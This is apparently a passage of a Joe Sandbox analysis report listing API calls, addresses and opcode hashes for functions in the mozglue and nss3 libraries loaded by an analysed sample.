                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468295787.000000006C7D2000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_6c740000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Heapmemset$AllocateBackCaptureFreeStackTrace
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 2764315370-0
                                                                                                                                                                                                                                                                                        • Opcode ID: dc808ff0f4cc9866960d73273519c1b11c497a4b748e46d1f1883ff68fe2f059
                                                                                                                                                                                                                                                                                        • Instruction ID: 8adcc39e338eb7596b3a7deffa06fdf8f88c5d1a71a02bc319e3688f592c075f
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: dc808ff0f4cc9866960d73273519c1b11c497a4b748e46d1f1883ff68fe2f059
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 95516271A002098FE714CFA9CE80B9AB7A6FF89314F298639D555A7B55D730F9078B80
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • ?DoubleToAscii@DoubleToStringConverter@double_conversion@@SAXNW4DtoaMode@12@HPADHPA_NPAH3@Z.MOZGLUE ref: 6C744E5A
                                                                                                                                                                                                                                                                                        • ?CreateDecimalRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHHPAVStringBuilder@2@@Z.MOZGLUE(?,?,?,?,?), ref: 6C744E97
                                                                                                                                                                                                                                                                                        • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C744EE9
                                                                                                                                                                                                                                                                                        • memcpy.VCRUNTIME140(?,?,00000000), ref: 6C744F02
                                                                                                                                                                                                                                                                                        • ?CreateExponentialRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHPAVStringBuilder@2@@Z.MOZGLUE(?,?,?,?), ref: 6C744F1E
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2468184127.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468162713.000000006C740000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468246182.000000006C7BD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468271199.000000006C7CE000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468295787.000000006C7D2000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_6c740000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: String$Double$Converter@double_conversion@@$Builder@2@@CreateRepresentation@$Ascii@DecimalDtoaExponentialMode@12@memcpystrlen
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 713647276-0
                                                                                                                                                                                                                                                                                        • Opcode ID: bc9ec20eb2b9fe04fac9afa1aebb04fdb8e28e726573333197d063bb0afbc3f4
                                                                                                                                                                                                                                                                                        • Instruction ID: 0e05828829d7c92b5d02fea5262cbee31eb467c3377f1837cf49ad8fe14082f5
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: bc9ec20eb2b9fe04fac9afa1aebb04fdb8e28e726573333197d063bb0afbc3f4
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: DD41DE716087059FC701CF29C98095BB7E8BF8A344F14CA2DF96697B41DB30E958EB92
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • moz_xmalloc.MOZGLUE(-00000002,?,6C75152B,?,?,?,?,6C751248,?), ref: 6C75159C
                                                                                                                                                                                                                                                                                        • memcpy.VCRUNTIME140(00000023,?,?,?,?,6C75152B,?,?,?,?,6C751248,?), ref: 6C7515BC
                                                                                                                                                                                                                                                                                        • moz_xmalloc.MOZGLUE(-00000001,?,6C75152B,?,?,?,?,6C751248,?), ref: 6C7515E7
                                                                                                                                                                                                                                                                                        • free.MOZGLUE(?,?,?,?,?,?,6C75152B,?,?,?,?,6C751248,?), ref: 6C751606
                                                                                                                                                                                                                                                                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,6C75152B,?,?,?,?,6C751248,?), ref: 6C751637
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2468184127.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468162713.000000006C740000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468246182.000000006C7BD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468271199.000000006C7CE000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468295787.000000006C7D2000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_6c740000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: moz_xmalloc$_invalid_parameter_noinfo_noreturnfreememcpy
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 733145618-0
                                                                                                                                                                                                                                                                                        • Opcode ID: acc5c5b71ed7c09814360470b47f203a203f233a69361036a71fad54d2c76d76
                                                                                                                                                                                                                                                                                        • Instruction ID: 00323db2e438b86139106da5cdab825b8d2b443b2a4a2d49e44bedc68afb5435
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: acc5c5b71ed7c09814360470b47f203a203f233a69361036a71fad54d2c76d76
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7A310872A001048BCB188E78DA5446E77A9FB853657A50B2DE823DBBD5EF30D9248792
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • moz_xmalloc.MOZGLUE(00000000,?,00000000,?,?,6C7BE330,?,6C76C059), ref: 6C7AAD9D
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C75CA10: malloc.MOZGLUE(?), ref: 6C75CA26
                                                                                                                                                                                                                                                                                        • memset.VCRUNTIME140(00000000,00000000,00000000,00000000,?,?,6C7BE330,?,6C76C059), ref: 6C7AADAC
                                                                                                                                                                                                                                                                                        • free.MOZGLUE(?,?,?,?,00000000,?,?,6C7BE330,?,6C76C059), ref: 6C7AAE01
                                                                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,00000000,?,?,6C7BE330,?,6C76C059), ref: 6C7AAE1D
                                                                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,00000000,00000000,00000000,?,?,?,00000000,?,?,6C7BE330,?,6C76C059), ref: 6C7AAE3D
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2468184127.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468162713.000000006C740000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468246182.000000006C7BD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468271199.000000006C7CE000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468295787.000000006C7D2000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_6c740000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: ErrorLast$freemallocmemsetmoz_xmalloc
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 3161513745-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 4f060cd4d6137cca0490e643277be09b282c8cb38e4c7b422b31cefb8c5e2264
                                                                                                                                                                                                                                                                                        • Instruction ID: 990dea73faedc9b79131d0ada17ead00cfbb0d4039988b9f5127165fe4853b37
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4f060cd4d6137cca0490e643277be09b282c8cb38e4c7b422b31cefb8c5e2264
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 273164B1A002159FDB50DF758D49AABBBF8EF48665F15843DE84AE7700E734E804CBA0
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetModuleHandleW.KERNEL32(00000000), ref: 6C74B532
                                                                                                                                                                                                                                                                                        • moz_xmalloc.MOZGLUE(?), ref: 6C74B55B
                                                                                                                                                                                                                                                                                        • memset.VCRUNTIME140(00000000,00000000,?), ref: 6C74B56B
                                                                                                                                                                                                                                                                                        • wcsncpy_s.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?), ref: 6C74B57E
                                                                                                                                                                                                                                                                                        • free.MOZGLUE(00000000), ref: 6C74B58F
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2468184127.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468162713.000000006C740000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468246182.000000006C7BD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468271199.000000006C7CE000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468295787.000000006C7D2000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_6c740000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: HandleModulefreememsetmoz_xmallocwcsncpy_s
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 4244350000-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 30571d260b2982965dd7e59bcbae652ff3c0a3ac12621fad83fdf918e14dcb40
                                                                                                                                                                                                                                                                                        • Instruction ID: 22254ae42119247e42bf6a595f2b61e7190ace362655f507cfb4f8db7806a84a
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 30571d260b2982965dd7e59bcbae652ff3c0a3ac12621fad83fdf918e14dcb40
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A921D271A006059BDB009F69CD44BAEFBB9FF46304F288039E8189B341E735ED11C7A0
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

APIs
• MozDescribeCodeAddress.MOZGLUE(?,?), ref: 6C7A6E78
  • Part of subcall function 6C7A6A10: InitializeCriticalSection.KERNEL32(6C7CF618), ref: 6C7A6A68
  • Part of subcall function 6C7A6A10: GetCurrentProcess.KERNEL32 ref: 6C7A6A7D
  • Part of subcall function 6C7A6A10: GetCurrentProcess.KERNEL32 ref: 6C7A6AA1
  • Part of subcall function 6C7A6A10: EnterCriticalSection.KERNEL32(6C7CF618), ref: 6C7A6AAE
  • Part of subcall function 6C7A6A10: strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000100), ref: 6C7A6AE1
  • Part of subcall function 6C7A6A10: strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000100), ref: 6C7A6B15
  • Part of subcall function 6C7A6A10: strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000100,?,?), ref: 6C7A6B65
  • Part of subcall function 6C7A6A10: LeaveCriticalSection.KERNEL32(6C7CF618,?,?), ref: 6C7A6B83
• MozFormatCodeAddress.MOZGLUE ref: 6C7A6EC1
• fflush.API-MS-WIN-CRT-STDIO-L1-1-0(?), ref: 6C7A6EE1
• _fileno.API-MS-WIN-CRT-STDIO-L1-1-0(?), ref: 6C7A6EED
• _write.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000400), ref: 6C7A6EFF
Memory Dump Source
• Source File: 00000002.00000002.2468184127.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true
• Associated: 00000002.00000002.2468162713.000000006C740000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000002.00000002.2468246182.000000006C7BD000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000002.00000002.2468271199.000000006C7CE000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000002.00000002.2468295787.000000006C7D2000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_6c740000_u3z0.jbxd
Similarity
• API ID: CriticalSectionstrncpy$AddressCodeCurrentProcess$DescribeEnterFormatInitializeLeave_fileno_writefflush
• String ID:
• API String ID: 4058739482-0
• Opcode ID: 1e88bb323eba81ab1b0790ac41fa32e406858827575a59c036123fcb1f6b8126
• Instruction ID: 2c3936fcf83be2e472029d35556f422f7a55620001d8b76dfdbc0e96530bd827
• Opcode Fuzzy Hash: 1e88bb323eba81ab1b0790ac41fa32e406858827575a59c036123fcb1f6b8126
• Instruction Fuzzy Hash: 8C21A4B1A0421A9FDF10CF69D9896DA77F9FF88308F044139E84997341DB70AA598F92
Uniqueness
Uniqueness Score: -1.00%

APIs
  • Part of subcall function 6C8F5B40: PR_GetIdentitiesLayer.NSS3 ref: 6C8F5B56
• PR_SetError.NSS3(FFFFE005,00000000), ref: 6C8F2CEC
  • Part of subcall function 6C90C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C90C2BF
• PR_EnterMonitor.NSS3(?), ref: 6C8F2D02
• PR_EnterMonitor.NSS3(?), ref: 6C8F2D1F
• PR_ExitMonitor.NSS3(?), ref: 6C8F2D42
• PR_ExitMonitor.NSS3(?), ref: 6C8F2D5B
Memory Dump Source
• Source File: 00000002.00000002.2468341392.000000006C7E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7E0000, based on PE: true
• Associated: 00000002.00000002.2468321043.000000006C7E0000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000002.00000002.2468742808.000000006C97F000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000002.00000002.2468798495.000000006C9BE000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000002.00000002.2468849903.000000006C9BF000.00000008.00000001.01000000.00000008.sdmp
• Associated: 00000002.00000002.2468897034.000000006C9C0000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000002.00000002.2468931608.000000006C9C5000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_6c7e0000_u3z0.jbxd
Similarity
• API ID: Monitor$EnterExit$ErrorIdentitiesLayerValue
• String ID:
• API String ID: 1593528140-0
• Opcode ID: 4ef27760c05e354bdbdc14a9bf5efb7db43890b1c91ebd88415995a73019c396
• Instruction ID: bda344ae4e96b6378d29179f5d14e23d43e8b98fdc62f0634982f3b704650d4c
• Opcode Fuzzy Hash: 4ef27760c05e354bdbdc14a9bf5efb7db43890b1c91ebd88415995a73019c396
• Instruction Fuzzy Hash: D701CCB19102445BE7309E29FC40BC7B7A5EF55359F014925E4A986710E63AF41687A2
Uniqueness
Uniqueness Score: -1.00%

APIs
• VirtualFree.KERNEL32(?,00000000,00008000,00003000,00003000,?,6C743DEF), ref: 6C780D71
• VirtualAlloc.KERNEL32(?,08000000,00003000,00000004,?,6C743DEF), ref: 6C780D84
• VirtualFree.KERNEL32(00000000,00000000,00008000,?,6C743DEF), ref: 6C780DAF
Strings
Memory Dump Source
• Source File: 00000002.00000002.2468184127.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true
• Associated: 00000002.00000002.2468162713.000000006C740000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000002.00000002.2468246182.000000006C7BD000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000002.00000002.2468271199.000000006C7CE000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000002.00000002.2468295787.000000006C7D2000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_6c740000_u3z0.jbxd
Similarity
• API ID: Virtual$Free$Alloc
• String ID: : (malloc) Error in VirtualFree()$<jemalloc>
• API String ID: 1852963964-2186867486
• Opcode ID: 55831268facfa6aaf7356d8501009de5fb009be69eb6debf907c1415a284fb0c
• Instruction ID: 4b11ac8d2ce61f927313fb866c0faee50631fae5f50efa66310b0dbf588e0726
• Opcode Fuzzy Hash: 55831268facfa6aaf7356d8501009de5fb009be69eb6debf907c1415a284fb0c
• Instruction Fuzzy Hash: 21F089313876962BE62011665E0BF6A265D6BC2B65F348135F704DAEC0DA54F40446B6
Uniqueness
Uniqueness Score: -1.00%

APIs
• __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6C792E2D
Strings
Memory Dump Source
• Source File: 00000002.00000002.2468184127.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true
• Associated: 00000002.00000002.2468162713.000000006C740000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000002.00000002.2468246182.000000006C7BD000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000002.00000002.2468271199.000000006C7CE000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000002.00000002.2468295787.000000006C7D2000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_6c740000_u3z0.jbxd
Similarity
• API ID: __acrt_iob_func
• String ID: (root)$ProfileBuffer parse error: %s$expected a Time entry
• API String ID: 711238415-4149320968
• Opcode ID: 197d957731c44988eba029a50ec1a19a733a693e0fe3dc59567c64e579d6062c
• Instruction ID: a7772f453f908a0caaf3366bfb4d0feb546e8425cde991da6980d065274a9343
• Opcode Fuzzy Hash: 197d957731c44988eba029a50ec1a19a733a693e0fe3dc59567c64e579d6062c
• Instruction Fuzzy Hash: B151E1B06083818FC724DF24E68959FF7E1AFC9358F10492DE59A97760EB30D949CB46
Uniqueness

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 6C77CBE8: GetCurrentProcess.KERNEL32(?,6C7431A7), ref: 6C77CBF1
  • Part of subcall function 6C77CBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C7431A7), ref: 6C77CBFA
• EnterCriticalSection.KERNEL32(6C7CE784,?,?,?,?,?,?,?,00000000,75922FE0,00000001,?,6C77D1C5), ref: 6C76D4F2
• LeaveCriticalSection.KERNEL32(6C7CE784,?,?,?,?,?,?,?,00000000,75922FE0,00000001,?,6C77D1C5), ref: 6C76D50B
  • Part of subcall function 6C74CFE0: EnterCriticalSection.KERNEL32(6C7CE784), ref: 6C74CFF6
  • Part of subcall function 6C74CFE0: LeaveCriticalSection.KERNEL32(6C7CE784), ref: 6C74D026
• InitializeCriticalSectionAndSpinCount.KERNEL32(0000000C,00001388,?,?,?,?,?,?,?,00000000,75922FE0,00000001,?,6C77D1C5), ref: 6C76D52E
• EnterCriticalSection.KERNEL32(6C7CE7DC), ref: 6C76D690
• LeaveCriticalSection.KERNEL32(6C7CE784,?,?,?,?,?,?,?,00000000,75922FE0,00000001,?,6C77D1C5), ref: 6C76D751
Strings
Memory Dump Source
• Source File: 00000002.00000002.2468184127.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true
• Associated: 00000002.00000002.2468162713.000000006C740000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000002.00000002.2468246182.000000006C7BD000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000002.00000002.2468271199.000000006C7CE000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000002.00000002.2468295787.000000006C7D2000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_6c740000_u3z0.jbxd
Similarity
• API ID: CriticalSection$EnterLeave$Process$CountCurrentInitializeSpinTerminate
• String ID: MOZ_CRASH()
• API String ID: 3805649505-2608361144
• Opcode ID: b0331040749ccbc3b540d9d71a8891d954bf293b42dc0e340f5d3b3a3f0125c3
• Instruction ID: 302274b390d3ad9aad69dae23807a82f7a4f3ef4c1c8448bfc59ed66dc67e488
• Opcode Fuzzy Hash: b0331040749ccbc3b540d9d71a8891d954bf293b42dc0e340f5d3b3a3f0125c3
• Instruction Fuzzy Hash: 01512371A047468FD724CF29C29871AB7E1EB99704F24493EE999C7F85D730E800CB96
Uniqueness

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 6C744290: strlen.API-MS-WIN-CRT-STRING-L1-1-0(6C783EBD,6C783EBD,00000000), ref: 6C7442A9
• tolower.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,00000000,?,6C79B127), ref: 6C79B463
• _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C79B4C9
• strncmp.API-MS-WIN-CRT-STRING-L1-1-0(FFFFFFFF,pid:,00000004), ref: 6C79B4E4
Strings
Memory Dump Source
• Source File: 00000002.00000002.2468184127.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true
• Associated: 00000002.00000002.2468162713.000000006C740000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000002.00000002.2468246182.000000006C7BD000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000002.00000002.2468271199.000000006C7CE000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000002.00000002.2468295787.000000006C7D2000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_6c740000_u3z0.jbxd
Similarity
• API ID: _getpidstrlenstrncmptolower
• String ID: pid:
• API String ID: 1720406129-3403741246
• Opcode ID: 0d29203872ba66409156e34af5f7811c1195a4180301b5459257b632e90cd3a5
• Instruction ID: 04e3b50dc91a140a0025ffb491f8e890b191c01348d9e5e0c3fb1a6fb38db4a5
• Opcode Fuzzy Hash: 0d29203872ba66409156e34af5f7811c1195a4180301b5459257b632e90cd3a5
• Instruction Fuzzy Hash: 5C313331A012098FCB20CFA9EA84AEEB7B5FF44308F540539D8216BA41D731F984DBE1
Uniqueness

Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,000134E5,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,?), ref: 6C7F6D36
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        • database corruption, xrefs: 6C7F6D2A
                                                                                                                                                                                                                                                                                        • %s at line %d of [%.10s], xrefs: 6C7F6D2F
                                                                                                                                                                                                                                                                                        • 9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C7F6D20
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2468341392.000000006C7E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7E0000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468321043.000000006C7E0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468742808.000000006C97F000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468798495.000000006C9BE000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468849903.000000006C9BF000.00000008.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468897034.000000006C9C0000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468931608.000000006C9C5000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_6c7e0000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: sqlite3_log
                                                                                                                                                                                                                                                                                        • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                                                                                                                                                                                                                                                        • API String ID: 632333372-598938438
                                                                                                                                                                                                                                                                                        • Opcode ID: dace25aeb660bd8a089ffd9241d8d0423018966dce077f15ad380ca3a3b9ef67
                                                                                                                                                                                                                                                                                        • Instruction ID: b4827fe5f20741db8c9378fb4e1ed1e09d3f9a9c542ec4750cbb4f3c60d88b6b
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: dace25aeb660bd8a089ffd9241d8d0423018966dce077f15ad380ca3a3b9ef67
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D82148316043059BCB10CF19CA86B5AB7F2AF84318F14852CD8699BF51E371FA46C7A1
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C92CD70: PR_LoadLibrary.NSS3(ws2_32.dll,?,?,?,6C92CC7B), ref: 6C92CD7A
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C92CD70: PR_FindSymbol.NSS3(00000000,getaddrinfo), ref: 6C92CD8E
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C92CD70: PR_FindSymbol.NSS3(00000000,freeaddrinfo), ref: 6C92CDA5
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C92CD70: PR_FindSymbol.NSS3(00000000,getnameinfo), ref: 6C92CDB8
                                                                                                                                                                                                                                                                                        • PR_GetUniqueIdentity.NSS3(Ipv6_to_Ipv4 layer), ref: 6C92CCB5
                                                                                                                                                                                                                                                                                        • memcpy.VCRUNTIME140(6C9C14F4,6C9C02AC,00000090), ref: 6C92CCD3
                                                                                                                                                                                                                                                                                        • memcpy.VCRUNTIME140(6C9C1588,6C9C02AC,00000090), ref: 6C92CD2B
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C849AC0: socket.WSOCK32(?,00000017,6C8499BE), ref: 6C849AE6
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C849AC0: ioctlsocket.WSOCK32(00000000,8004667E,00000001,?,00000017,6C8499BE), ref: 6C849AFC
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C850590: closesocket.WSOCK32(6C849A8F,?,?,6C849A8F,00000000), ref: 6C850597
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2468341392.000000006C7E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7E0000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468321043.000000006C7E0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468742808.000000006C97F000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468798495.000000006C9BE000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468849903.000000006C9BF000.00000008.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468897034.000000006C9C0000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468931608.000000006C9C5000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_6c7e0000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: FindSymbol$memcpy$IdentityLibraryLoadUniqueclosesocketioctlsocketsocket
                                                                                                                                                                                                                                                                                        • String ID: Ipv6_to_Ipv4 layer
                                                                                                                                                                                                                                                                                        • API String ID: 1231378898-412307543
